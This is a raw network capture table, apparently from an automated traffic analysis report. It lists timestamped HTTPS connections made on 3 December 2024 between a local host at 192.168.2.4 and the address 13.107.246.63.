                                                                        Dec 3, 2024 17:51:07.359611988 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.360306025 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.360320091 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.360708952 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.360714912 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.438648939 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.439202070 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.439269066 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.439676046 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.439691067 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.477004051 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.477652073 CET49871443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.477674007 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.478180885 CET49871443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.478188992 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.769303083 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.770004988 CET49873443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.770062923 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.770584106 CET49873443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.770605087 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.776971102 CET4434986913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.777045012 CET4434986913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.777112007 CET49869443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.777308941 CET49869443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.777329922 CET4434986913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.777354956 CET49869443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.777360916 CET4434986913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.780280113 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.780323029 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.780396938 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.780541897 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.780553102 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.810394049 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.813688993 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.813766003 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.813776970 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.813843966 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.814131975 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.814131975 CET49870443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.814158916 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.814169884 CET4434987013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.817148924 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.817184925 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.817301035 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.817492008 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.817503929 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.890283108 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.890312910 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.890358925 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.890439987 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.890502930 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.890738964 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.890738964 CET49872443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.890783072 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.890810013 CET4434987213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.893862009 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.893908024 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.893990040 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.894159079 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.894166946 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.937323093 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.941303968 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.941385984 CET49871443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.941426039 CET49871443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.941426039 CET49871443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.941438913 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.941448927 CET4434987113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.944588900 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.944633961 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:07.944775105 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.946036100 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:07.946053982 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.205650091 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.205835104 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.205905914 CET49873443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.205980062 CET49873443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.206001043 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.206024885 CET49873443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.206031084 CET4434987313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.210268974 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.210324049 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:08.210412025 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.210813999 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:08.210828066 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.665066004 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.665633917 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.665652990 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.666135073 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.666141987 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.758322954 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.758893967 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.758918047 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.759390116 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.759394884 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.898068905 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.898693085 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.898715973 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.899173975 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.899178982 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.979892015 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.980511904 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.980546951 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.980982065 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.980988026 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.997391939 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.997838020 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.997864962 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:09.998217106 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:09.998224020 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.173105001 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.173183918 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.173240900 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.173460007 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.173477888 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.173489094 CET49875443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.173495054 CET4434987513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.177084923 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.177119017 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.177237988 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.177402973 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.177413940 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.206940889 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.209790945 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.209978104 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.210158110 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.210170031 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.210194111 CET49877443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.210200071 CET4434987713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.212934017 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.212990999 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.213227987 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.213407993 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.213423014 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.345415115 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.345479012 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.345530987 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.345783949 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.345797062 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.345808029 CET49874443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.345813036 CET4434987413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.348917961 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.348954916 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.349035978 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.349221945 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.349232912 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.424993038 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.426538944 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.426621914 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.426661968 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.426675081 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.426685095 CET49878443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.426691055 CET4434987813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.429750919 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.429785967 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.429866076 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.430039883 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.430051088 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.452765942 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.455939054 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.455982924 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.456022978 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.456053972 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.456110954 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.456116915 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.456130028 CET49876443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.456134081 CET4434987613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.458755016 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.458775043 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:10.458861113 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.458997011 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:10.459009886 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.961126089 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.961675882 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:11.961699009 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.962172031 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:11.962177992 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.997778893 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.998383999 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:11.998415947 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:11.998847961 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:11.998855114 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.068454981 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.068972111 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.069008112 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.069622993 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.069631100 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.229058027 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.229640007 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.229667902 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.230102062 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.230108023 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.244446039 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.244762897 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.244781971 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.245177031 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.245182991 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.407160044 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.407237053 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.407309055 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.407506943 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.407506943 CET49879443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.407526016 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.407535076 CET4434987913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.412240982 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.412302971 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.412389040 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.412566900 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.412580013 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.442523003 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.442797899 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.442858934 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.442868948 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.442913055 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.443032980 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.443048954 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.443062067 CET49880443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.443067074 CET4434988013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.446327925 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.446367979 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.446624994 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.446624994 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.446656942 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.505059004 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.508167028 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.508236885 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.508316994 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.508333921 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.508342981 CET49881443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.508357048 CET4434988113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.511003971 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.511033058 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.511106014 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.511236906 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.511248112 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.675246954 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.678280115 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.678330898 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.678345919 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.678392887 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.678452969 CET49882443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.678467035 CET4434988213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.681530952 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.681561947 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.681646109 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.681823969 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.681835890 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.688725948 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.692037106 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.692092896 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.692126036 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.692142010 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.692152977 CET49883443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.692157984 CET4434988313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.694518089 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.694540024 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:12.694617987 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.694763899 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:12.694775105 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.246721029 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.247260094 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.247289896 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.247749090 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.247756004 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.254843950 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.255187035 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.255203962 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.255554914 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.255561113 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.281438112 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.282089949 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.282103062 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.283308029 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.283318043 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.435571909 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.436633110 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.436676025 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.437942028 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.437947035 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.442372084 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.443072081 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.443090916 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.444267035 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.444272995 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.691271067 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.692182064 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.694442034 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.694497108 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.694525003 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.694570065 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.694673061 CET49886443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.694684029 CET4434988613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.695302010 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.695378065 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.695513010 CET49885443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.695528984 CET4434988513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.698489904 CET49889443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.698525906 CET4434988913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.698597908 CET49890443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.698610067 CET49889443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.698632002 CET4434989013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.698678017 CET49890443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.698899984 CET49889443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.698913097 CET4434988913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.699253082 CET49890443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.699265957 CET4434989013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.739554882 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.742567062 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.742633104 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.742707014 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.742716074 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.742726088 CET49884443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.742729902 CET4434988413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.746709108 CET49891443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.746731043 CET4434989113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.746799946 CET49891443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.746982098 CET49891443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.746990919 CET4434989113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.869256973 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.872673035 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.872757912 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.872796059 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.872812033 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.872824907 CET49887443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.872829914 CET4434988713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.876997948 CET49892443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.877028942 CET4434989213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.877109051 CET49892443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.877207041 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.877306938 CET49892443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.877325058 CET4434989213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.880536079 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.880600929 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.880671978 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.880685091 CET4434988813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:14.880695105 CET49888443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:14.880700111 CET4434988813.107.246.63192.168.2.4
